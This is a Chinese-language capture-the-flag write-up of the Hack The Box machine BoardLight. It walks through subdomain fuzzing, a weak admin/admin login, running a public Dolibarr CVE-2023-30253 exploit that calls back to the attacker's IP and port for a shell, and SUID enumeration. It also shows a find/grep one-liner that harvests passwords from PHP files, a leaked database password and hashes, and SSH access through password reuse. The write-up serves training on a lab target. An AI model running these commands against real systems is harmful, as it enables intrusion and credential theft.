HTB-BoardLight
1 | ip='10.129.254.182' |
开了22,80

vhost爆破
翻了一圈没辙,htb提示爆破子域名
1 | ffuf -w subdomains-top1million-5000.txt:FUZZ -u http://board.htb -H 'Host: FUZZ.board.htb' -fw 6243 -t 100 |
找到crm.board.htb

弱口令
弱口令admin/admin直接登进来了

CVE-2023-30253
Dolibarr<=17.0.0 有个RCE
https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253
1 | python poc.py http://crm.board.htb admin admin 10.10.16.42 9001 |

权限有点低,得考虑提权了
提权
找下suid有这些东西
1 | $ find / -user root -perm -4000 -print 2>/dev/null |
看下端口有3306

找下数据库账号密码
1 | find / -regex ".*\.php" 2>/dev/null | xargs grep -E "=jdbc:|pass=|passwd=" 2>/dev/null |
配置文件在/var/www/html/crm.board.htb/htdocs/conf/conf.php

1 | $dolibarr_main_db_name='dolibarr'; |
1 | mysql -u'dolibarrowner' -p'serverfun2$2023!!' -e 'SHOW TABLES FROM dolibarr;' |
挑点数据
| login | pass_crypted | api_key |
|---|---|---|
| dolibarr | $2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm | NULL |
| admin | $2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96 | yr6V3pXd9QEI |
看半天没用啊,结果是mysql密码登录ssh,htb老喜欢玩这个
1 | ssh larissa@$ip |

enlightenment
之前suid能看到enlightenment,问了下GPT这玩意有个提权洞


3e992b38b4d504af1d4243a401568db7
- 标题: HTB-BoardLight
- 作者: metafa1ica
- 创建于 : 2025-08-04 22:40:45
- 更新于 : 2025-08-17 14:28:18
- 链接: https://metafa1ica.github.io/post/606d94a37d5d/
- 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论